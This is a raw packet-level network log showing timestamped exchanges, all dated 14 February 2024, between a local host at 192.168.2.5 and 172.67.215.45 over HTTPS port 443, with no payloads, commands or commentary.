Feb 14, 2024 09:08:18.239921093 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.239945889 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.239969015 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.240021944 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.240061045 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.240081072 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.240087986 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.240114927 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.240137100 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.240984917 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.241024971 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.241053104 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.241064072 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.241086960 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.241107941 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.241607904 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.241657019 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.241682053 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.241693020 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.241719961 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.241743088 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.242701054 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.242739916 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.242769003 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.242779016 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.242805958 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.242825985 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.242875099 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.242916107 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.242937088 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.242942095 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.242973089 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.242995024 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.243793011 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.243834972 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.243860006 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.243880987 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.243901014 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.243918896 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.244688988 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.244765997 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.244776011 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.244788885 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.244812965 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.244834900 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.245326042 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.245367050 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.245392084 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.245404005 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.245428085 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.245448112 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.245748043 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.245790005 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.245812893 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.245821953 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.245850086 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.245868921 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.246567011 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.246608019 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.246632099 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.246645927 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.246665001 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.246686935 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.247400045 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.247440100 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.247467041 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.247484922 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.247502089 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.247524023 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.248163939 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.248212099 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.248239040 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.248253107 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.248275995 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.248296022 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.248349905 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.248392105 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.248415947 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.248424053 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.248451948 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.248472929 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.249320984 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.249358892 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.249391079 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.249408960 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.249427080 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.249444962 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.250096083 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.250134945 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.250155926 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.250168085 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.250193119 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.250212908 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.250905991 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.250946045 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.250973940 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.250987053 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.251010895 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.251032114 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.251317024 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.251355886 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.251380920 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.251394033 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.251419067 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.251444101 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.252156973 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.252202988 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.252226114 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.252244949 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.252262115 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.252283096 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.252859116 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.252897978 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.252923012 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.252934933 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.252959967 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.252980947 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.253928900 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.253968000 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.254000902 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.254017115 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.254033089 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.254111052 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.254142046 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.254158974 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.254159927 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.254199028 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.254229069 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.254261971 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.255080938 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.255125046 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.255156040 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.255176067 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.255192041 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.255213022 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.255913973 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.255954027 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.255978107 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.255995989 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.256015062 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.256033897 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.256542921 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.256582975 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.256618977 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.256639957 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.256654024 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.256679058 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.256714106 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.256756067 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.256783962 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.256791115 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.256817102 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.256839037 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.257695913 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.257735014 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.257761955 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.257785082 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.257801056 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.257833004 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.258552074 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.258590937 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.258621931 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.258636951 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.258661032 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.258671999 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.258678913 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.258693933 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.258719921 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.258739948 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.258749008 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.258759975 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.258786917 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.258821964 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.259588957 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.259627104 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.259671926 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.259685993 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.259706974 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.259727001 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.260530949 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.260570049 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.260595083 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.260606050 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.260634899 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.260657072 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.261295080 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.261333942 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.261360884 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.261370897 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.261396885 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.261420012 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.262064934 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.262104034 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.262128115 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.262137890 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.262166977 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.262195110 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.262247086 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.262285948 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.262314081 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.262319088 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.262350082 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.262368917 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.263077021 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.263114929 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.263144016 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.263154984 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.263180971 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.263202906 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.264146090 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.264183998 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.264214039 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.264225960 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.264250040 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.264271021 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.264276981 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.264297009 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.264327049 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.264339924 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.264363050 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.264369011 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.264400005 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.264429092 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.265079021 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.265120983 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.265144110 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.265156984 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.265182972 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.265207052 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.265974045 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.266011953 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.266036034 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.266043901 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.266087055 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.266108990 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.266647100 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.266685009 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.266719103 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.266726017 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.266767979 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.266827106 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.266865969 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.266884089 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.266889095 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.266907930 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.266931057 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.267802000 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.267844915 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.267877102 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.267890930 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.267924070 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.267946959 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.268455982 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.268496037 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.268523932 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.268532991 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.268570900 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.268591881 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.269299030 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.269414902 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.269457102 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.269474983 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.269480944 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.269521952 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.269603968 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.269649029 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.269665003 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.269670010 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.269701958 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.269757986 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.270410061 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.270451069 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.270488024 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.270498037 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.270526886 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.270544052 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.271173000 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.271210909 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.271239042 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.271250010 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.271275043 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.271296978 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.271442890 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.271482944 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.271508932 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.271513939 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.271545887 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.271568060 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.272224903 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.272263050 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.272286892 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.272295952 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.272325993 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.272346020 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.273241997 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.273279905 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.273308992 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.273318052 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.273344994 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.273365974 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.273367882 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.273390055 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.273420095 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.273432970 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.273452044 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.273457050 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.273485899 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.273519039 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.274172068 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.274214029 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.274241924 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.274250984 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.274281979 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.274307966 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.274883032 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.274920940 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.274955988 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.274961948 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.275006056 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.275038958 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.275851965 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.275890112 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.275926113 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.275934935 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.275975943 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.276004076 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.276470900 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.276509047 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.276545048 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.276560068 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.276597023 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.276624918 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.276787043 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.276825905 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.276858091 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.276865005 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.276904106 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.276936054 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.277653933 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.277693033 CET	443	49712	172.67.215.45	192.168.2.5
